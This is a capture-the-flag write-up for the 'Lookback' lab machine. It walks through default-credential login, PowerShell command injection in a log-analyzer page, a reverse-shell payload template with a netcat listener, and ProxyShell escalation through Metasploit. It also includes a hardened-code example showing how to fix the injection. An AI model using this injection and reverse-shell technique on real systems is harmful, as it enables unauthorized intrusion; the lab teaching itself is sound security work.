# Lookback

First, let's run an `nmap` scan:

<figure><img src="/files/XPZaWv47uwo9M1slWod9" alt=""><figcaption></figcaption></figure>

So we have 3 open ports. One HTTP server, one HTTPS server, and one MS-terminal server.

Let's scan the HTTPS server first:

<figure><img src="/files/nfBhHqAH75XHce83lMV9" alt=""><figcaption></figcaption></figure>

Lots of `Status: 302` responses, which means a redirect, but there's one noticeable `Status: 401` (unauthorized): "/test".\
Let's see what's on that page.

<figure><img src="/files/SmoXwh1uRpmTuPX7hURS" alt=""><figcaption></figcaption></figure>

There's a simple HTTP-auth blocking our way. Let's try some default credentials like `admin:admin`:

<figure><img src="/files/StIHptOP9uh6cmctRRNj" alt=""><figcaption></figcaption></figure>

It worked.\
We are brought to a webpage with a "log analyzer", and the first flag.

<figure><img src="/files/j8DROhpM1uB79r2z2vbz" alt=""><figcaption></figcaption></figure>

Let's see what happens when we press the "run" button:

<figure><img src="/files/zkGGjKQxV4bEn3qkIXQN" alt=""><figcaption></figcaption></figure>

It seems to output the content of a file.\
This is very vulnerable, because we control which file it outputs. Let's see what happens when we enter nothing:

<figure><img src="/files/Dho60ve7XiGq84EnBEDJ" alt=""><figcaption></figcaption></figure>

As you can see, the command being run is

```
Get-Content('C:\$INPUT')
```

This is easily exploitable by manipulating the input.\
We can end the command and chain another one using `');`.\
Because there is still a trailing `')`, we need to balance it for our payload to run, so we add another `('` at the end.
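To make the root cause concrete from the defender's side, here is an added example (not the log analyzer's real code, which the box does not expose) of the vulnerable pattern beside a hardened version. The unsafe function builds a script string from user input and evaluates it, which is exactly what `');...;('` abuses. The safe function never evaluates input as code: it allow-lists characters, resolves the name under a fixed base directory (the `C:\inetpub\logs` path is an assumption) and rejects anything that escapes that directory, which also blocks `..\` traversal.

```powershell
# Added example: a vulnerable "log analyzer" handler and a hardened one.
# Neither is the real code from the Lookback box.

# Vulnerable pattern: user input is concatenated into a script string and then
# evaluated, so input such as "');<command>;('" breaks out of Get-Content.
function Get-LogUnsafe {
    param([string]$UserInput)
    $script = "Get-Content('C:\$UserInput')"
    Invoke-Expression $script
}

# Hardened pattern: the input is treated as a relative file name only.
function Get-LogSafe {
    param(
        [Parameter(Mandatory)][string]$UserInput,
        [string]$BaseDir = 'C:\inetpub\logs'   # assumed allow-listed log directory
    )
    # 1. Character allow-list: letters, digits, '_', '.', '-', and '\' only.
    #    Quotes, parentheses and semicolons used by the injection are rejected.
    if ($UserInput -notmatch '^[A-Za-z0-9_.\-\\]+$') {
        throw "Rejected: file name contains characters outside the allow-list."
    }
    # 2. Resolve the full path and make sure it stays under $BaseDir,
    #    which also stops '..\' traversal that passes the allow-list.
    $base = [System.IO.Path]::GetFullPath($BaseDir.TrimEnd('\') + '\')
    $full = [System.IO.Path]::GetFullPath((Join-Path $base $UserInput))
    if (-not $full.StartsWith($base, [System.StringComparison]::OrdinalIgnoreCase)) {
        throw "Rejected: '$UserInput' resolves outside $base."
    }
    # 3. Pass the path as a parameter, never as code; -LiteralPath also
    #    disables wildcard expansion of the supplied name.
    Get-Content -LiteralPath $full
}

# Demonstration with constructed inputs in the shape the writeup describes:
$injection = "');Write-Output INJECTED;('"
try { Get-LogSafe -UserInput $injection } catch { Write-Output "Blocked: $_" }
try { Get-LogSafe -UserInput '..\..\Windows\win.ini' } catch { Write-Output "Blocked: $_" }
```

The key design point is that the fix is not "escape the quotes better": as long as the file name ends up inside a string that `Invoke-Expression` evaluates, some encoding will get through. Binding the value to a cmdlet parameter removes the code/data confusion entirely, and the base-directory check limits what a valid name can reach.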

The final payload (using [revshells.com](https://www.revshells.com/)) looks like this:

```
'); $PAYLOAD; ('  // The template
');powershell -e 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;('
```

Before we press the "Run" button, we open a `netcat` listener:\
![](/files/aWCwFLHCiPKQegPrMtzp)

Then we press the "Run" button, and we get a shell back:

![](/files/TGB8ub2I3Ft7bLjxDXBq)

### Privilege escalation

After looking around the system a bit, we found an important text file, and the second flag:

<figure><img src="/files/nsWl1pZH8FfFLk9VYCw8" alt=""><figcaption></figcaption></figure>

We find three e-mail addresses:

```
dev-infrastracture-team@thm.local
carol@thm.local
joe@thm.local
```

The line that stands out is: "`Install the security update for MS Exchange`".\
So we need to find an MS Exchange vulnerability.

Let's check the version of MS Exchange using `GCM exsetup |%{$_.Fileversioninfo}`:

<figure><img src="/files/X4otWSUVR69LLOyWfbc2" alt=""><figcaption></figcaption></figure>

After a bit of googling we find the "ProxyShell" exploit, which we can use in Metasploit with the e-mail address we found before:

<figure><img src="/files/PnDea0IuVoXxaNPYxC7D" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Make sure your LPORT isn't in use by netcat, otherwise the exploit will not work.
{% endhint %}

And we have a shell as the Root user, which we use to get the third flag:

<figure><img src="/files/K9jTCdaV85PV3n6Kt6NB" alt=""><figcaption></figcaption></figure>
